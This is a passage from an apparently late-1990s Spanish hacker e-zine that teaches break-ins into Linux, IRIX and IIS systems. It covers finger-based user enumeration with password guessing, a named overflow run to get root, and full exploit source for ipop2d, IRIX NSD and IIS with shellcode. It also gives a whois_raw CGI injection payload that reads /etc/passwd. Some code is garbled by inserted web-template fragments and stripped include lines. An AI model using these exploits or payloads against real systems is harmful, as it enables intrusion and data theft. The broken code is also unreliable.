Status:   
Este es mi ultimo mensaje con mis datos cambiados



atentamente
El Pantera Azul

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Como   se  puede  apreciar,  ya  aunque  nos  hagan  Telnet,  ni  asi  pueden 
identificarnos.

Ahora ya podemos ser unos anonimos felices :)


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


07. _________________________________________________ Hacking en Linux 4.X  
                                                      By madjester de nterror
                                                      Editado por magis


(nota:  hola  soy magis, el creador de este articulo es madjester de nterror, 
pero dado a su  origen  o sea  gringo, y por ende tener unos problemas con la 
gramatica espa~ola, me pidio que lo  reescribiera de forma que sea entendible 
para todo publico ok ...empezando john -incremental:magis madjester... 
shiaaaaaaaaa)

intro: aca dare unos trucos para  acceder a cualquier sistem con linux 4.x es 
decir 4.1, 4.2,..... etc

temas a tratar:

-finger
-exploits remotos
-exploits locales

Finger: 

En  estos  sistemas  este  port  79   es   muy  util ya que de forma facil es 
posible  sacar  una  lista  completa  de  todos  los usuarios, o sea en otras 
palabras  todos los logins existentes, para asi poder  probar  los  logins  y 
ponerle como  passwd  la misma palabra que el login .. jeje y si tiene suerte 
ingresaras al sistema .. ya  que  muchas personas suelen poner como passwd la 
misma plabra que el login y ese craso error  puede  ser  utilizado  por todos 
nosotros como recien les mencione.

pero  como  conseguimos  la  lista  completa  si no tenemos acceso al fichero 
passwd jejeje para eso le sacaremos provecho al finger o port 79 que en estos 
sistemas  nos  dara  la lista completa de usuarios con sus respectivos logins
esto se a esto:

login:
(passwd encriptado:id:gid:nombre, telefono, etc.:/dir/del/usuario:/shell >>>>
la  parte importante de esto es lo subrayado o sea el nombre.. ya que este es 
parte  del  GECOS que es quien provee info sobre el usuario, esto se una para 
programas como el finger (huy coincidencia)

cuando  uno  hace   finger  a un  host  determinado buscando un login .. como 

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   el  finger buscara a ese  usuario  entre  la  lista  total  de 
usuarios.  por  ejemplo si tenemos esta linea en el passwd que pertenece a un 
usario que se llama underchile:

underchile:x8998dfydisuf.df:516:513:carlos perez, 2123422, .... :/dev/null:
/bin/sh

si hacemos finger al login o sea underchile asi.. finger a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 ,  
aca es el  caso  del  nombre), o perez@(tambien es parte del nombre) nos dara 
como resultado 

Login:underchile  name:carlos perez     Directory: /dev/null
			Shell: /bin/sh   Office: ...  
			Home Phone: 2123422
			
jejeje,  y  si  por  casualidad  en el server existe otro usario o mas con el 
nombre carlos o el apellido perez nos  dara  la  lista completa de todos esos 
usuarios con sus respectivos logins jeje, lindo no y mas lindo aun es el caso 
que los linux 4.x ponen como nombre por default  para  todos  su usuarios que 
creas, el  nombre  RHS Linux user.. tonces imaginence como  podriamos  ocupar 
esto   je,  asi   de   simple   finger  
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 ,  
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 ,  o 

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   esto nos deberia dar la lista completa de todos los usuarios 
del server y con  sus respectivos logins y toda la demas info de los usuarios 
que da el finger, madjester de nterror tiene un script para proveer una lista 
depurada  del  finger  el  script  se  llama FingerDump.sh .. ejecutalo de la 
siguiente manera 

# FingerDump.sh host file

depues  que lo ejecutes el "file" sera el archivo donde quedara toda la lista 
si es que la hay

aca esta el script:



if [ jumi ]; then
	if [ [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt] ]; then
		finger RHS@jumi | grep "Login" | awk -F ' ' {print [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]} | sort - | uniq >> [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]
	fi
	else
		printf "se necesita otro argumento mas\n"
	fi
else
	printf "uso: {jumi [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]} host file\n"
fi



Exploits remotos:

para estos linux que son sistemas viejos hay hartos exploits que lo hacen mas 
facil de hackear, el mas usado y util es el named buffer overflow este puedes 
conseguirlo en "dm.freelsd.net/ADM/exploits/named_v3.c"

luego que lo consigas, compilalo :

[root@localhost]$ gcc named_v3.c -o named

y ejecutalo:

[root@localhost]$ ./named victima.cl 
longueur shellcode : 175
taille buffer 1536
offset 2750
adresse: 0xbffff532
Connecting to nameserver via TCP...done.
Attente connexion...
Shell found! Free to execute commands suffixed with a ';'
id;
uid=0(root) gid=0(root)

y listo hehe tienes tu root en la maquina remota

3. Exploits locales

El  numero  de  exploits  locales es numerosisimo, hay msgchk, Sprobe, mount, 
ping, etc...

el linuxsh deberia rootear cualquiera de estas sistemas, y en segundos

[idiotaconpassfacil @victima.cl]$ ./linuxsh -stat
(muchas idioteces)

[idiotasconpassfacil @victima.cl]$ ./linuxsh -root
(muchas mas idioteces)

bash# (listo ya tienes root)


Bueno, eso parece ser todo por ahora, espero verlos en la proxima e-zine...

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


8. ______________________________________ La embarre...??? o es que me parece
                                          By Taker


Bueno,  antes  que nada quiero repetirles que nada de esto esta hecho por mi, 
yo solo me doy a la  funcion  de traducir y acomodar los parrafos para que me 
encajen en el e-zine, veremos  si  algun  dia nosotros los hispano parlantes, 
nos  sacamos  ampollas  en  el  cerebro  y  empezamos   a   descubrir   estas 
vulnerabilidades, vamos, no es dificil, solo es cuention de jugar un poco con 
nuestros equipos...(Vamos, hay que seguirle los pasos a Cuartango =) )


Y vamos con el primero:


POP2:

Explicacion
~~~~~~~~~~~
Los  demonios  POP2  y  POP3 soportan el concepto de "proxy anonimo" donde un 
usuario remoto puede  conectarse  y abrir una conexion a IMAP a un mailbox en 
cualquier servidor en el cual tenga una cuenta valida.

Un atacante puede conectarse al puerto POP2 vulneralble y hacer una solicitud 
de conexion a un servidor IMAP que  este  bajo  su control. Una vez conectado
solicita un comando "FOLD" con un argumento tan  largo  que  cause  un buffer 
overflow al buffer que reside en la pila. El argumento para el FOLD  debe ser
de alrededor de 1000 bytes para causar el overflow.

Aqui les pongo el xploit para que deduzcan un poco su funcionamiento,  si  no 
captan  la  idea,  mejor  vayanse a estudiar un poco de C, mierda, yo tambien 
me tengo que ir a estudiarlo. XDDD

Xploit
~~~~~~
/* 
* Sekure SDI (Brazilian Information Security Team) 
* ipop2d remote exploit for linux (Jun, 02 1999) 
* 
* by c0nd0r <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 > 
* 
* (read the instructions below) 
* 
* Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr, 
* falcon, vader, c_orb, marty(nordo!) and minha malinha! 
* also to #uground (irc.brasnet.org) and #SDI (efnet), 
* guys at el8.org, toxyn.org, pulhas.org 
* 
* Sincere Apologizes: duke (for the mistake we made with the wu-expl), 
* your code rocks. 
* 
* Usage: 
* 
* SDI-pop2    [offset] 
* 
* where imap_server = IMAP server at your box (or other place as well) 
* user = any account at your box 
* pass = the account's password 
* offset = 0 is default -- increase if it's necessary. 
* 
* Example: (netcat rocks) 
* 
* (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109 
* 
* ---------------------------------------------------------------- 
* HOWTO-exploit: 
* 
* In order to gain remote access as user nobody, you should set 
* an IMAP server at your box (just edit the inetd.conf) or at 
* any other machine which you have an account. 
* 
* During the anonymous_login() function, the ipop2d will set the 
* uid to user nobody, so you are not going to get a rootshell. 
* ---------------------------------------------------------------- 
* 
* We do NOT take any responsability for the consequences of using 
* this code -- you've been warned! don't be a script k1dd13! 
* 
*/ 


#include  

/* 
* (shellcode) 
* 
* jmp 0x1f 
* popl %esi 
* movl %esi,0x8(%esi) 
* xorl %eax,%eax 
* movb %eax,0x7(%esi) 
* movl %eax,0xc(%esi) 
* movb {jumi [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]}xb,%al 
* movl %esi,%ebx 
* leal 0x8(%esi),%ecx 
* leal 0xc(%esi),%edx 
* int {jumi [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]}x80 
* xorl %ebx,%ebx 
* movl %ebx,%eax 
* inc %eax 
* int {jumi [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]}x80 
* call -0x24 
* .string \"/bin/sh\" 
* grab your shellcode generator at www.sekure.org 
*/ 

char c0d3[] 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" 
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" 
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" 
"\xff\xff/bin/sh"; 


main (int argc, char *argv[] ) { 
char buf[2500]; 
int x,y=1000, offset=0; 
long addr; 
char host[255], user[255], pass[255]; 
int bsize=986; 

if ( argc < 4) { 
printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n"); 
printf ( "usage: 
(SDI-pop2    [offset];cat) | nc lame.org 109\n"); 
exit (0); 
} 

snprintf ( host, sizeof(host), "%s", argv[1]); 
snprintf ( user, sizeof(user), "%s", argv[2]); 
snprintf ( pass, sizeof(pass), "%s", argv[3]); 

if ( argc > 4) offset = atoi ( argv[4]); 
/* gimme the ret + offset */ 
addr = 0xbffff3c0 + offset; 
fprintf ( stderr, "0wning data since 0x%x\n\n", addr); 

/* calculation of the return address position */ 
bsize -= strlen ( host); 

for ( x = 0; x < bsize-strlen(c0d3); x++) 
buf[x] = 0x90; 

for ( y = 0; y < strlen(c0d3); x++, y++) 
buf[x] = c0d3[y]; 

for ( ; x < 1012; x+=4) { 
buf[x ] = addr & 0x000000ff; 
buf[x+1] = (addr & 0x0000ff00) >> 8; 
buf[x+2] = (addr & 0x00ff0000) >> 16; 
buf[x+3] = (addr & 0xff000000) >> 24; 
} 

sleep (1); 
printf ( "HELO %s:%s %s\r\n", host, user, pass); 
sleep (1); 
printf ( "FOLD %s\r\n", buf); 

} 


Posibles soluciones:
~~~~~~~~~~~~~~~~~~~

El  RedHat  6.0  viene  con  las  caracteristicas  de  proxy  del POP2 y POP3 
desactivadas por defecto.

La version 4.5 de IMAP ya esta disponible y no es vulnerable a este ataque.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerabilidad en el CGI whois_raw
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Explicacion
~~~~~~~~~~~
CDomain  ofrece  a  los  usuarios  un script CGI que les da la posibilidad de 
busqueda de Nombre de Dominio. Una  vulnerabilidad en este script CGI permite
a un atacante ver cualquier archivo  almacenado  en  el servidor al que tiene 
acceso el script.

Solo  son  vulnerables  las  versiones 2.4 y anteriores, las versiones 2.5 en 
adelante y la version para NT  de  este  programa  no  son vulnerables a este
tipo de ataques.

La parte vulnerable del Codigo.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/perl 
# 
# whois_raw.cgi Written by J. Allen Hatch (
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 ) 
# 04/17/97 
# 
# This script is part of the cdomain v1.0 package which is available at: 
# http://www.your-site.com/~zone/whois.html 

.. 

require ("/usr/lib/perl5/cgi-lib.pl"); 

.. 

$fqdn = $in{'fqdn'}; 
# Fetch the root name and concatenate 
# Fire off whois 
if ($in{'root'} eq "it") { 
@result=`$whois_cmd_it $fqdn`; 
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") { 
@result="Dettagli non disponibili per il dominio richiesto."; 
} else { 
@result=`$whois_cmd $fqdn`; 
} 

.. 

Si  despues  de  la  direccion 'http://www.victim.com/cgi-bin/whois_raw.cgi?' 
se  adiciona  un  parametro  "fqdn"  que  no es un verdadero dominio, pero si  
algun archivo en la maquina comprometida tipo:

fqdn=%0Acat%20/etc/passwd 

Pues nos debe mostrar el famoso archivo passwd.
Debes saber para que sirve, o no..????

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Uno cortico de PC Anywhere
~~~~~~~~~~~~~~~~~~~~~~~~~~

Este  es vulnerable a un ataque DoS que vuelve el computador remoto imposible
de usar (bueno, no del todo, luego hay que reiniciar.)

Para  llevar  a  cabo  este  ataque  de  denegacion  de servicios (DoS) no se 
necesita  ningun tipo de autentificacion ante la maquina  remota,  haciendolo
extremadamente facil de efectuar.

Este  ataque  se  lleva  a  cabo  haciendo  una conexion al puerto 5631 en un 
computador que tenga instalado el PC Anywhere.  Despues  de haber introducido 
mas  o  menos  200  kb de basura, PC Anywhere responde "Please press "
y claro, como somos  buenos  usuarios le hacemos caso XDDD y la maquina queda 
totalmente colgada...

Posibles soluciones:
~~~~~~~~~~~~~~~~~~~~
Esto se puede solucionar aplicando el patch distribuido por Symantec en:

ftp.symantec.com/public/english_us_canada/products/
pcanywhere/pcanywhere32/ver8.0/updates/aw32tcp.dll 

Nota: las dos lineas anteriores van juntas. ;)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Xploit para el sistema Virtual de archivos - NSD -

En  IRIX  6.5, SGI  movio  todos  los  nombres de servicios, servicios NIS, y 
DNS  lookups  a  un  proceso de usuario llamado  NSD,  el  cual  exporta  los 
resultados de las solicitudes a un sistema virtual de archivos.

Este sistema virtual de  archivos  normalemente  es  montado  en  /ns  por el 
programa /sbin/nsmount, el cual es llamado por nsd durante el  inicio  de  la
maquina. El mismo demonio NSD exporta el sistema  de  archivos via NFS3 sobre
una conexion UDP a  un  puerto  especifico  normalmente en el rango de 1024 a
1029.  Normalmente  en un equipo de escritorio el puerto sera el 1024, ya que 
el NSD normalmente es el primer servicio RPC/UDP en ser iniciado.

La exportacion  de  este sistema virtual de archivos contituye una amenaza de 
seguridad, ya que permite  a  un  usuario  remoto  obtener informacion que es
considerada  delicada (como el archivo de password  shadow, los  NDS  lookups
y otros archivos  de  consideracion), todo  esto  se  puede  lograr  sin  ser
detectado.

El sistema de archivos NFS no esta registrado  en  mountd,  asi  que  no  hay 
opcion de manejarlo a traves del mountd. Pero dado que el puerto NFS es facil 
de encontrar con un escaneo de  puertos,  y tabien sabiendo que el handle del 
NSD  utiliza  simplemente  una  cadena de 32 ceros (0), es  facil  montar  el
sistema de archivos  NSD  desde  cualquier  Host  en  Internet. NSD  aceptara 
cualquier  orden  tipo NFS  a  cualquiera. Y para complicar la cosa, como los 
puertos NFS son asignados  dinamicamente,  es  muy dificil protegerlos con un 
FW, el puerto cambiara en cada inicio del sistema o  si  se baja el demonio y 
se vuelve a iniciar.


Codigo
~~~~~~

Este programa puede montar el systema virtual  de  archivos  exportado por el 
NSD desde un host  remoto  en  una  maquina  que corra IRIX 6.4o superior, se 
aprovecha  del  flag MS_DOXATTR  definido  en  estos sistemas. No se sabe con 
certeza que hace este flag a nivel del protocolo NFS, pero permite al cliente
solicitar al NFS evadir algunos controles que  supuestamente se debian llevar 
a cabo para con el cliente.


Para compilarlo: En un SGI con un compilador C SGI:

cc -o nsdadv nsdadv.c

Para correrlo:

nsdadv /mnt victima.vulnerable.com 1024 

Aunque recuerden que tambien puede estar entre 1024 - 1029

Xploit en si: (o era en do...???)


#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  

/* Filesystem type name for nsd-exported filesystem. */ 
#define NSD_FSTYPE "nfs3" 

/* File the records mounted filesystems. */ 
#define MTAB_FILE "/etc/mtab" 

/* Socket address we'll fill in with our destination IP and port. */ 
struct sockaddr_in sin; 

/* All zero file handle. This appears to be the base handle for the nsd 
filesystem. Great security, huh? */ 
unsigned char fh[NFS_FHSIZE] = { 0 }; 

/* NFS mount options structure to pass to mount(2). The meanings of these 
are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The 
flags field indicates that this is a soft mount without log messages, 
and to set the initial timeout and number of retries from fields in 
this structure. The fh field is a pointer to the filehandle of the 
mount point, whose size is set by fh_len. As noted above, the mount 
point filehandle is just 32 zeroes. */ 
struct nfs_args nx 
{ 
&sin, /* addr */ 
(fhandle_t *) fh, /* fh */ 
NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */ 
0, /* wsize */ 
0, /* rsize */ 
100, /* timeo */ 
2, /* retrans */ 
0, /* hostname */ 
0, /* acregmin */ 
0, /* acregmax */ 
0, /* acdirmin */ 
0, /* acdirmax */ 
0, /* symttl */ 

{ 0 }, /* base */ 

0, /* namemax */ 
NFS_FHSIZE, /* fh_len */ 
/* On IRIX 6.4 and up there are also the following... */ 
/* bdsauto */ 
/* bdswindow */ 
/* On IRIX 6.5 there are also the following... */ 
/* bdsbuflen */ 
/* pid */ 
/* maxthreads */ 
}; 

void usage (void) 
{ 
fprintf (stderr, "usage: nsmount_remote directory host port\n\n"); 
fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on  via NSD daemon\n"); 
fprintf (stderr, "port  onto .\n\n"); 
exit (1); 
} 

int main (int argc, char **argv) 
{ 
char *dir; 
char *host; 
char *ports; 
int port; 
struct hostent *h; 
int fstype; 
FILE *mtabf; 
struct mntent mnt 
{ 
0, 
0, 
NSD_FSTYPE, 
"soft,timeo=100,retrans=2", 
0, 
0, 
}; 

if (argc != 4) 
usage (); 

dir = argv[1]; 
host = argv[2]; 
port = atoi ((ports = argv[3])); 

/* Prepare for host lookup. */ 
memset ((void *) &sin, 0, sizeof (sin)); 
sin.sin_family = 2; 
sin.sin_port = port; 

/* Look up the host. */ 
if (inet_aton (host, &sin.sin_addr)) 
; 
else if ((h = gethostbyname (host))) 
{ 
unsigned long *l = (unsigned long *) *(h->h_addr_list); 
sin.sin_addr.s_addr = l[0]; 
} 
else 
{ 
fprintf (stderr, "Cannot resolve host %s.\n", host); 
return 1; 
} 

/* Get filesystem type index for nsd filesystem type. */ 
if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0) 
{ 
perror ("sysfs (" NSD_FSTYPE ")"); 
return 1; 
} 

fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n", 
host, inet_ntoa (sin.sin_addr), port, dir); 

/* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR 
means "tell server to trust us with attributes" and MS_DATA means 
"6-argument mount". 

MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't 
seem to work without this option. So even though this program will 
compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to 
attack nsd. */ 
if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx)) 
!= 0) 
{ 
perror ("mount"); 
return 1; 
} 

/* Record mount point in /etc/mtab. */ 
mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1); 
sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports); 
mnt.mnt_dir = dir; 
if (!(mtabf = setmntent (MTAB_FILE, "r+"))) 
{ 
perror ("setmntent"); 
return 1; 
} 
if (addmntent (mtabf, &mnt) < 0) 
{ 
perror ("addmntent"); 
return 1; 
} 
if (endmntent (mtabf) < 0) 
{ 
perror ("endmntent"); 
return 1; 
} 

return 0; 
} 


Posibles soluciones:
~~~~~~~~~~~~~~~~~~~~

*Aparentemente* el problema esta solucionado en la version 6.5.3 del IRIX

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Vamos,  creo  que ya deben haber oido sobre el Gran falo en el IIS, si no, no 
se los voy a decir, lo  que  si  les traigo es el codigo para hacer funcionar 
el fallo desde un pc con Linux. ;) espero  que  les funcione...asi para coger
una maquina con NT no tendran que cambiar el Linux.

/* iis 4.0 exploit
 * by eeye security
 *
 * ported to unix/C by the teso crew.
 *
 * shoutouts to #hax and everyone else knowing us...
 *  you know who you are.
 *
 * gcc -o tesoiis tesoiis.c -Wall
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int     net_connect (struct sockaddr_in *cs, char *server,
	unsigned short int port, char *sourceip,
	unsigned short int sourceport, int sec);

void    net_write (int fd, const char *str, ...);
unsigned long int       net_resolve (char *host);

char stuff[] = "\x42\x68\x66\x75\x41\x50"; /* "!GET /" */

#define URL_OFFSET      1055

char front[] = "GET /AAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"\x41\x41\x41\x41\x41\x41\xb0\x87\x67\x68\xb0\x87"
	"\x67\x68\x90\x90\x90\x90\x58\x58\x90\x33\xc0\x50"
	"\x5b\x53\x59\x8b\xde\x66\xb8\x21\x02\x03\xd8\x32"
	"\xc0\xd7\x2c\x21\x88\x03\x4b\x3c\xde\x75\xf4\x43"
	"\x43\xba\xd0\x10\x67\x68\x52\x51\x53\xff\x12\x8b"
	"\xf0\x8b\xf9\xfc\x59\xb1\x06\x90\x5a\x43\x32\xc0"
	"\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43\x52\x51"
	"\x53\x56\xb2\x54\xff\x12\xab\x59\x5a\xe2\xe6\x43"
	"\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43"
	"\x52\x53\xff\x12\x8b\xf0\x5a\x33\xc9\x50\x58\xb1"
	"\x05\x43\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75"
	"\xf4\x43\x52\x51\x53\x56\xb2\x54\xff\x12\xab\x59"
	"\x5a\xe2\xe6\x33\xc0\x50\x40\x50\x40\x50\xff\x57"
	"\xf4\x89\x47\xcc\x33\xc0\x50\x50\xb0\x02\x66\xab"
	"\x58\xb4\x50\x66\xab\x58\xab\xab\xab\xb1\x21\x90"
	"\x66\x83\xc3\x16\x8b\xf3\x43\x32\xc0\xd7\x3a\xc8"
	"\x75\xf8\x32\xc0\x88\x03\x56\xff\x57\xec\x90\x66"
	"\x83\xef\x10\x92\x8b\x52\x0c\x8b\x12\x8b\x12\x92"
	"\x8b\xd7\x89\x42\x04\x52\x6a\x10\x52\xff\x77\xcc"
	"\xff\x57\xf8\x5a\x66\x83\xee\x08\x56\x43\x8b\xf3"
	"\xfc\xac\x84\xc0\x75\xfb\x41\x4e\xc7\x06\x8d\x8a"
	"\x8d\x8a\x81\x36\x80\x80\x80\x80\x33\xc0\x50\x50"
	"\x6a\x48\x53\xff\x77\xcc\xff\x57\xf0\x58\x5b\x8b"
	"\xd0\x66\xb8\xff\x0f\x50\x52\x50\x52\xff\x57\xe8"
	"\x8b\xf0\x58\x90\x90\x90\x90\x50\x53\xff\x57\xd4"
	"\x8b\xe8\x33\xc0\x5a\x52\x50\x52\x56\xff\x77\xcc"
	"\xff\x57\xec\x80\xfc\xff\x74\x0f\x50\x56\x55\xff"
	"\x57\xd8\x80\xfc\xff\x74\x04\x85\xc0\x75\xdf\x55"
	"\xff\x57\xdc\x33\xc0\x40\x50\x53\xff\x57\xe4\x90"
	"\x90\x90\x90\xff\x6c\x66\x73\x6f\x66\x6d\x54\x53"
	"\x21\x80\x8d\x84\x93\x86\x82\x95\x21\x80\x8d\x98"
	"\x93\x8a\x95\x86\x21\x80\x8d\x84\x8d\x90\x94\x86"
	"\x21\x80\x8d\x90\x91\x86\x8f\x21\x78\x8a\x8f\x66"
	"\x99\x86\x84\x21\x68\x8d\x90\x83\x82\x8d\x62\x8d"
	"\x8d\x90\x84\x21\x78\x74\x70\x64\x6c\x54\x53\x21"
	"\x93\x86\x84\x97\x21\x94\x86\x8f\x85\x21\x94\x90"
	"\x84\x8c\x86\x95\x21\x84\x90\x8f\x8f\x86\x84\x95"
	"\x21\x88\x86\x95\x89\x90\x94\x95\x83\x9a\x8f\x82"
	"\x8e\x86\x21\x90\x98\x8f\x4f\x86\x99\x86\x21"

/* stick it in here */

	"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
	"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
	"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
	"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
	"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
	"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
	"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
	"\x21\x21\x21"
	".htr HTTP/1.0";

void
usage (void)
{
	printf ("usage: ./tesoiis host port url\n");
	exit (EXIT_FAILURE);
}

int
main (int argc, char *argv[])
{
	/* yadda,yadda.. you can try exploiting our exploit!!
	 * update: hmm.. is this exploitable? gets EIP touched by exit()?
	 * gotta check this later...
	 */

	char                    host[256], url[256];
	int                     port,sd,t = 0;
	int                     m = 0;
	char                    *cc, *pfft;
	struct sockaddr_in      cs;

	printf ("teso crew IIS exploit.. shellcode by eEye.\n");
	printf ("------------------------------------------\n");
	if (argc < 4)
		usage();

	strcpy (host, argv[1]);
	strcpy (url, argv[3]);

	port = atoi (argv[2]);
	if ((port < 1) || (port > 65535))
		usage();

	cc = url;
	pfft = front + URL_OFFSET;

	while (*cc) {
		if (*cc == '/' && 0 == t) {
			memcpy (pfft, stuff, 6);
			pfft += 6;
			t = 1;
		} else {
			*pfft = *cc + 0x21;
			pfft++;
		}
		cc++;
		m += 1;
	}

	printf ("Host: %s Port: %d Url: %s\n", host, port, url);
	printf ("Connecting... ");
	fflush (stdout);
	sd = net_connect (&cs, host, port, NULL, 0, 30);  

	if (sd < 1) {
		printf ("failed!\n");
		exit (EXIT_FAILURE);
	}

	printf ("done.. sending shellcode..");
	fflush (stdout);

	net_write (sd, "%s\n\n", front);
	printf ("done.. closing fd!\n");
	close (sd);

	printf ("%s\n", front);

	exit (EXIT_SUCCESS);
}

int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
		unsigned short int sourceport, int sec)
{
	int             n, len, error, flags;
	int             fd;
	struct timeval  tv;
	fd_set          rset, wset;

	/* first allocate a socket */
	cs->sin_family = AF_INET;
	cs->sin_port = htons (port);

	fd = socket (cs->sin_family, SOCK_STREAM, 0);
	if (fd == -1)
		return (-1);

	if (!(cs->sin_addr.s_addr = net_resolve (server))) {
		close (fd);
		return (-1);
	}

	flags = fcntl (fd, F_GETFL, 0);
	if (flags == -1) {
		close (fd);
		return (-1);
	}
	n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
	if (n == -1) {
		close (fd);
		return (-1);
	}

	error = 0;

	n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
	if (n < 0) {
		if (errno != EINPROGRESS) {
			close (fd);
			return (-1);
		}
	}
	if (n == 0)
		goto done;

	FD_ZERO(&rset);
	FD_ZERO(&wset);
	FD_SET(fd, &rset);
	FD_SET(fd, &wset);
	tv.tv_sec = sec;
	tv.tv_usec = 0;

	n = select(fd + 1, &rset, &wset, NULL, &tv);
	if (n == 0) {
		close(fd);
		errno = ETIMEDOUT;
		return (-1);
	}
	if (n == -1)
		return (-1);

	if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
		if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
			len = sizeof(error);
			if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
				errno = ETIMEDOUT;
				return (-1);
			}
			if (error == 0) {
				goto done;
			} else {
				errno = error;
				return (-1);
			}
		}
	} else
		return (-1);

done:
	n = fcntl(fd, F_SETFL, flags);
	if (n == -1)
		return (-1);
	return (fd);
}

unsigned long int
net_resolve (char *host)
{
	long            i;
	struct hostent  *he;

	i = inet_addr(host);
	if (i == -1) {
		he = gethostbyname(host);
		if (he == NULL) {
			return (0);
		} else {
			return (*(unsigned long *) he->h_addr);
		}
	}
	return (i);
}

void
net_write (int fd, const char *str, ...)
{

	char    tmp[8192];
	va_list vl;
